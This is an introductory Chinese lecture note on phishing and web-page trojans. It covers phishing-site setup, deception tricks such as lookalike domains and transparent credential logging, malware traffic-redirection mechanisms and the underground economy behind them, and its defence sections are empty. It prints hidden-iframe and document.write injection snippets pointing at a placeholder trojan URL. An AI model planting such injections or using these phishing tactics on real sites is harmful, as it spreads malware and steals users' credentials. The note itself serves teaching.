【网络钓鱼 & 网页木马】基础介绍

$1 网络钓鱼

• 网络钓鱼是社会工程学在互联网中广泛实施的一种典型攻击方式，通过发送大量声称来自于银行或其它知名机构的欺骗性垃圾邮件，意图引诱收信人给出个人敏感信息

一个典型的例子：

网络钓鱼目标：获取个人敏感信息

• 用户名、口令、帐号ID
• 网银、ATM PIN码或信用卡信息

1.1 攻击的手段与策略

一、手段

网站钓鱼

• 架设钓鱼网站－目标：知名金融机构及商务网站
• 发送大量欺骗性垃圾邮件
• 诱骗因特网用户访问钓鱼网站并以敏感信息登录
• 滥用个人敏感信息
  • 资金转账－经济利益，
  • 冒用身份－犯罪目的

二、钓鱼攻击策略

1. 大规模扫描有漏洞的主机并攻陷主机

• 通过批扫描工具，自动攻击工具

有了服务器资源后，就可以在上面假设钓鱼网站

2. 架设钓鱼网站

• 前台假冒网站：假冒知名的金融机构、在线电子商务网站

  • 组织性：在集中服务器上存放多个目标的钓鱼网站页面脚本

    有组织的罪犯甚至能够实时跟踪各个目标组织机构网站的更新，并在集中服务器上存放这些假冒钓鱼网站的构建内容以及脚本

• 后台脚本：收集、验证用户输入，并通过某种渠道转发给钓鱼者

3. 欺骗技术

• 欺骗用户访问钓鱼网站

  • 实施DNS中毒攻击
  • 实施Pharming － 网络流量重定向
  • 通过(自动化)社会工程学－构造欺骗性垃圾邮件

• 关于欺骗性垃圾邮件

  • 发送途径－难以追踪
    • 因为是通过境外的开放邮件服务器，僵尸网络
  • 发送源－冒充知名权威机构
  • 发送内容－以各种安全理由、紧急事件，欺骗用户访问钓鱼网站，给出敏感个人信息

4. 欺骗技巧

• 使用IP地址代替域名

  • 在指向假冒网站的链接中使用IP地址代替域名。

  • 一些无戒备心的用户将不会检查(或不知道如何检查）这个IP地址是否来自假冒网站页面上所声称的目标机构

• 注册发音相近或形似的DNS域名:Unicode字符

  • (如与工商银行域名icbc.com.cn仅有一个字母之差的 lcbc.com.cn)
  • 并在上面架设假冒网站，期望用户不会发现他们之间的差异

• 多数真实的链接中混杂关键的指向假冒钓鱼网站的链接

  • 如果用户的电子邮件客户端软件支持HTML内容的自动获取，那么会在电子邮件被读取的时候自动地连接假冒网站
  • 用户手动浏览时也不会在大量与真实网站的正常网络活动中注意到少量与恶意服务器的连接

• 对链接URL进行编码和混淆

• 攻击浏览器，隐藏消息内容的本质

• 假冒钓鱼网站的透明性

  • 将假冒的钓鱼网站配置成记录用户提交的所有数据并进行不可察觉的日志，然后将用户重定向到真实的网站。

  • 比如用户输入口令后将导致一个“口令错误，请重试”错误，或甚至完全透明。

    • 大部分用户不会发觉，更相信是自己的错误输入

• 恶意软件安装浏览器助手工具

  这个工具将受害者重定向到假冒的钓鱼网站

• 使用恶意代码修改维护本地DNS域名和IP地址映射的hosts文件

1.2 网络钓鱼防范

• 业界应对趋势：

$2 网页木马－浏览器渗透攻击

2.1 概述

一、介绍

• 国内: “网页木马”, “网马”

  实际上就是Web页面植入的恶意软件

  网页木马就是表面上伪装成普通的网页文件或是将恶意的代码直接插入到正常的网页文件中，

  当有人访问时，网页木马就会利用对方系统或者浏览器的漏洞自动将配置好的木马的服务端下载到访问者的电脑上来自动执行

• Malicious Website: 恶意网站/挂马网站

• 网页感染已成为国内互联网最重要的恶意代码传播形式

二、发展历程

2.2 网络访问流量重定向机制（网页挂马机制）

一、内嵌HTML标签

• 最为简单和常见的流量重定向机制：iframe嵌入外部页面链接

• <iframe src="URL to Trojan" width="0" height="0" frameborder="0"> </iframe> 
  

• 其它的标签还有：frame, body onload事件, CSS标签等

二、恶意script脚本

• 很常见：利用script标签通过跨站脚本包含网页木马

• <script language=Javascript>document.write("<iframe width=1 height=1 src=URL to Trojan></iframe>"); </script>
  

  这段 JavaScript 代码在网页中嵌入一个 iframe 元素（尺寸极小）

  • document.write() 是 JavaScript 用于向文档写入内容

• window.open("URL to Trojan")

  window.open() 是 JavaScript 的一个内置函数，它用于在浏览器中创建新的窗口或标签页来加载指定的 URL 地址

三、内嵌对象

• 调用第三方应用软件或浏览器帮助对象（BHO）的内嵌对象进行攻击
• Adobe Pdf / Flash

2.3 网页木马”感染链“

• 网页木马通常不会直接存在于被挂马页面中
• 而是通过多层嵌套的内嵌链接、跨站脚本等方式构建网马“感染链”
  • 便于攻击者管理和统计
  • 通过混淆加大防御者分析难度
• 对于防御者是一个挑战：需要在网页动态视图树中对网马进行检测和跟踪

2.4 关于网页木马的研究工作

一、研究工作

二、网页木马背后驱动的地下经济链调查分析

• “信封”指的是窃取的账号和密码信息

三、网页木马总体技术流程

• 病毒编写者：负责实现网页木马和传统的盗号木马，并使用免杀技术躲避反病毒软件的检测
• 黑站长/网络骇客：出卖网站访问者或攻陷不安全的网站，出售这些网站的访问流量
• ”信封“盗窃者：在木马宿主站点上放置网页木马和传统盗号木马，并通过在大量网站中嵌入恶意链接将访问者重定向至网页木马，构建木马网络

2.5 防范措施